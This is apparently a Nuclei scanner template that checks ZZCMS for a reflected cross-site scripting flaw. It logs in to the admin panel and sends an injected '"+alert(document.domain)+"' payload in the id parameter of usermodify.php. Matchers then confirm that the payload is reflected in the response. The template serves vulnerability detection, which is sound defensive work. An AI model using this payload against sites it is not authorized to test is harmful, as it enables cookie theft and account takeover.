id: zzcms-xss

info:
  name: ZZCMS - Cross-Site Scripting
  author: ritikchaddha
  severity: high
  description: ZZCMS contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://github.com/JcQSteven/blog/issues/20
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    verified: true
  tags: zzcms,xss,authenticated

requests:
  - raw:
      - |
        POST /admin/logincheck.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        admin={{username}}&pass={{password}}

      - |
        GET /admin/usermodify.php?id=1%22%2balert(document.domain)%2b%22 HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "contains(all_headers_2, 'text/html')"
          - "status_code_2 == 200"
          - 'contains(body_2, "参数 1\"+alert(document.domain)+")'
        condition: and

# Enhanced by mp on 2022/09/23
